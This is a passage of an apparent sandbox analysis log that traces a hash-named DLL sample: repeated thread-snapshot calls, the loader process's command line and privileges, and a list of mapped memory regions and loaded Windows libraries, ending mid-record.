[0294.470] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.470] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.471] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.472] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.473] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.473] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.474] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.477] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.478] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.478] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.479] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.479] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.480] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.481] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.482] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.483] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.483] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.484] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.485] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.486] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.487] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.488] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.488] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.489] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.491] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.491] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.492] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.493] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.494] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.495] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.496] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.497] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.497] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.498] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.499] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.500] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.501] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.671] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.672] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.673] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.675] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.676] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.677] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.678] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.679] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.680] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.681] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.682] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.684] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.685] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.686] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.687] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.688] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.689] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.689] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.690] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.691] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.692] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.693] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.694] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.695] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.696] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.697] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.697] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.698] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.699] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.700] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.701] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.702] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.703] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.704] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.705] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.706] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.707] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.708] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.908] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.909] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.909] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.910] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.911] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.911] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.912] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.913] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.914] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.915] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.915] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.918] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.919] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.919] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.920] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.921] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.922] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.922] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.923] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.924] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.925] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.926] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.926] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.927] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.928] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.929] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.930] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.931] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.931] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.932] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.932] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.933] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.934] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.935] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.936] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.936] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.937] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.938] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.938] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.939] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.940] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.940] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.941] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.941] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.942] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.943] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.766] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.769] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.770] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.771] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.772] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.776] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.776] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.777] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.778] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.778] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.779] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.779] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.780] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.781] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.782] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.782] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.783] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.784] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.784] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.785] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.785] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.787] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.787] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.788] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.789] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.789] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.790] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.790] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.791] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.792] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.792] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.793] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.794] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) Thread: id = 204 os_tid = 0x110c Process: id = "28" image_name = "giumlol.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe" page_root = "0x80e9000" os_pid = "0x12a4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xcc8" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_end_decompress" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6520 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6521 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6522 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 6523 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 6524 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 6525 start_va = 0x170000 end_va = 0x171fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 6526 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6527 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6528 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 6529 start_va = 0x7ff626f50000 end_va = 0x7ff626f77fff monitored = 1 entry_point = 0x7ff626f51e8c region_type = mapped_file name = "giumlol.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe") Region: id = 6530 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6531 start_va = 0x430000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 6532 start_va = 0x7ffc5bfa0000 end_va = 0x7ffc5c187fff monitored = 0 entry_point = 0x7ffc5bfcba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6533 start_va = 0x7ffc5ecd0000 end_va = 0x7ffc5ed7cfff monitored = 0 entry_point = 0x7ffc5ece81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6534 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6535 start_va = 0x7ff5ffed0000 end_va = 0x7ff5fffcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5ffed0000" filename = "" Region: id = 6536 start_va = 0x530000 end_va = 0x5edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6537 start_va = 0x7ffc5e960000 end_va = 0x7ffc5eab5fff monitored = 0 entry_point = 0x7ffc5e96a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6549 start_va = 0x7ffc5f540000 end_va = 0x7ffc5f6c5fff monitored = 0 entry_point = 0x7ffc5f58ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 6550 start_va = 0x5f0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 6551 start_va = 0x7ffc5cc80000 end_va = 0x7ffc5e1defff monitored = 0 entry_point = 0x7ffc5cde11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 6552 start_va = 0x7ffc5e850000 end_va = 0x7ffc5e8ecfff monitored = 0 entry_point = 0x7ffc5e8578a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6553 start_va = 0x7ffc5bec0000 end_va = 0x7ffc5bf02fff monitored = 0 entry_point = 0x7ffc5bed4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 6554 start_va = 0x7ffc5c3c0000 end_va = 0x7ffc5ca03fff monitored = 0 entry_point = 0x7ffc5c5864b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 6555 start_va = 0x7ffc5f2c0000 end_va = 0x7ffc5f53cfff monitored = 0 entry_point = 0x7ffc5f394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 6556 start_va = 0x7ffc5e2b0000 end_va = 0x7ffc5e3cbfff monitored = 0 entry_point = 0x7ffc5e2f02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6557 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 6558 start_va = 0x7ffc5cac0000 end_va = 0x7ffc5cb29fff monitored = 0 entry_point = 0x7ffc5caf6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 6559 start_va = 0x7ffc5ec20000 end_va = 0x7ffc5ecc6fff monitored = 0 entry_point = 0x7ffc5ec358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6560 start_va = 0x7ffc5e8f0000 end_va = 0x7ffc5e94afff monitored = 0 entry_point = 0x7ffc5e9038b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6561 start_va = 0x7ffc5e7b0000 end_va = 0x7ffc5e801fff monitored = 0 entry_point = 0x7ffc5e7bf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 6562 start_va = 0x7ffc5be50000 end_va = 0x7ffc5be5efff monitored = 0 entry_point = 0x7ffc5be53210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 6563 start_va = 0x7ffc5cb50000 end_va = 0x7ffc5cc04fff monitored = 0 entry_point = 0x7ffc5cb922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 6568 start_va = 0x7ffc5be70000 end_va = 0x7ffc5bebafff monitored = 0 entry_point = 0x7ffc5be735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 6569 start_va = 0x7ffc5be30000 end_va = 0x7ffc5be43fff monitored = 0 entry_point = 0x7ffc5be352e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 6570 start_va = 0x7ffc5e3e0000 end_va = 0x7ffc5e522fff monitored = 0 entry_point = 0x7ffc5e408210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 6571 start_va = 0x180000 end_va = 0x1b8fff monitored = 0 entry_point = 0x1812f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 6572 start_va = 0x6f0000 end_va = 0x877fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 6573 start_va = 0x7ffc5e810000 end_va = 0x7ffc5e84afff monitored = 0 entry_point = 0x7ffc5e8112f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 6574 start_va = 0x880000 end_va = 0xa00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 6575 start_va = 0xa10000 end_va = 0x1e0ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a10000" filename = "" Region: id = 6579 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 6580 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 6581 start_va = 0x1e10000 end_va = 0x1f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e10000" filename = "" Region: id = 6582 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 6605 start_va = 0x1e10000 end_va = 0x1ecffff monitored = 0 entry_point = 0x1e30da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 6606 start_va = 0x1f30000 end_va = 0x1f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f30000" filename = "" Region: id = 6607 start_va = 0x7ffc45e90000 end_va = 0x7ffc45fd6fff monitored = 1 entry_point = 0x7ffc45f67cec region_type = mapped_file name = "8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" filename = "\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") Region: id = 6717 start_va = 0x1e10000 end_va = 0x1f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e10000" filename = "" Region: id = 6718 start_va = 0x1f40000 end_va = 0x213ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f40000" filename = "" Region: id = 6719 start_va = 0x2140000 end_va = 0x253ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 6829 start_va = 0x2540000 end_va = 0x2d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 6944 start_va = 0x2d40000 end_va = 0x3d0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d40000" filename = "" Region: id = 9259 start_va = 0x180000000 end_va = 0x180018fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000180000000" filename = "" Region: id = 9303 start_va = 0x3d10000 end_va = 0x4046fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 9862 start_va = 0x7ffc51070000 end_va = 0x7ffc512fdfff monitored = 0 entry_point = 0x7ffc51140f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 9863 start_va = 0x4050000 end_va = 0x42defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004050000" filename = "" Region: id = 10568 start_va = 0x4050000 end_va = 0x4197fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004050000" filename = "" Region: id = 10763 start_va = 0x4050000 end_va = 0x4212fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004050000" filename = "" Region: id = 11756 start_va = 0x4050000 end_va = 0x55e5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004050000" filename = "" Region: id = 11951 start_va = 0x7ffc5bcc0000 end_va = 0x7ffc5bce8fff monitored = 0 entry_point = 0x7ffc5bcd4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 11953 start_va = 0x7ffc5c190000 end_va = 0x7ffc5c356fff monitored = 0 entry_point = 0x7ffc5c1edb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 11954 start_va = 0x7ffc5be60000 end_va = 0x7ffc5be6ffff monitored = 0 entry_point = 0x7ffc5be656e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 11955 start_va = 0x4050000 end_va = 0x421afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004050000" filename = "" Region: id = 11961 start_va = 0x7ffc5a8a0000 end_va = 0x7ffc5a949fff monitored = 0 entry_point = 0x7ffc5a8c7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 11962 start_va = 0x7ffc5e740000 end_va = 0x7ffc5e7aafff monitored = 0 entry_point = 0x7ffc5e7590c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 11963 start_va = 0x7ffc5e950000 end_va = 0x7ffc5e957fff monitored = 0 entry_point = 0x7ffc5e951ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 11964 start_va = 0x7ffc5cb30000 end_va = 0x7ffc5cb46fff monitored = 0 entry_point = 0x7ffc5cb31390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 11968 start_va = 0x4050000 end_va = 0x41a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004050000" filename = "" Region: id = 11990 start_va = 0x7ffc4bf10000 end_va = 0x7ffc4bf1afff monitored = 0 entry_point = 0x7ffc4bf124e0 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 12045 start_va = 0x1b0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 12046 start_va = 0x1b0000 end_va = 0x1d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 12047 start_va = 0x1e0000 end_va = 0x1e6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 12048 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 12049 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 